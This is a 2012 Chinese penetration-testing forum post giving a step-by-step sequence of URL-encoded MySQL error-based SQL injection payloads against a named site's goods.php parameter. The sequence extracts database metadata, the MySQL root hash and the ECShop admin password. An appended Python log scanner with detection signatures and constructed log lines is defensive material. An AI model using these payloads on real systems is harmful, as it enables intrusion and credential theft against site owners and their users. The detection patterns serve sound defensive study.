中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Blind injection in detail

Author: admin    Time: 2012-9-5 14:59
Title: Blind injection in detail
Determining the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determining the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current database table names

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database user_name column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database password column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Obtaining the admin passwd (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
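Every payload in this post shares one shape: COUNT(*) with CONCAT(..., FLOOR(RAND()*2)) grouped by the alias, usually reading information_schema or mysql.user. The log scanner below, an added example that is not part of the original post, normalises the query string (double URL-decode, comment stripping, whitespace collapse) and flags requests carrying that shape; the access-log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post). The first two
# carry the COUNT(*)/CONCAT/FLOOR(RAND()*2)/GROUP BY shape shown above; the
# last two are benign requests that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2012:14:59:01 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 512
10.0.0.5 - - [05/Sep/2012:14:59:07 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20from%20information_schema.tables%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 512
10.0.0.9 - - [05/Sep/2012:15:02:11 +0800] "GET /goods.php?id=353&wsid=2 HTTP/1.1" 200 4096
10.0.0.9 - - [05/Sep/2012:15:03:40 +0800] "GET /search.php?q=random%20floor%20lamp HTTP/1.1" 200 2048
"""

# Request line of a Common Log Format entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signatures of the duplicate-key error-based technique and the metadata
# reads that usually accompany it, matched against the normalised query.
SIGNATURES = {
    "rand_groupby": re.compile(r"count\(\*\).*floor\(rand\(\d*\)\*2\).*group by", re.S),
    "information_schema": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "mysql_user": re.compile(r"mysql\.user"),
}

def normalise(query: str) -> str:
    """URL-decode twice (defeats double encoding), strip inline comments,
    collapse whitespace and lower-case so the signatures match reliably."""
    decoded = unquote_plus(unquote_plus(query))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", decoded).lower()

def scan_log(text: str):
    """Return (line_no, path, [signature names]) for each suspicious request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        norm = normalise(query)
        names = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
        if names:
            hits.append((n, path, names))
    return hits

if __name__ == "__main__":
    for line_no, path, names in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {path} -> {', '.join(names)}")
```

The same normalisation step is what a WAF rule needs in front of the signature; without the double decode a `%2520`-encoded payload would slip past a literal match.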




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2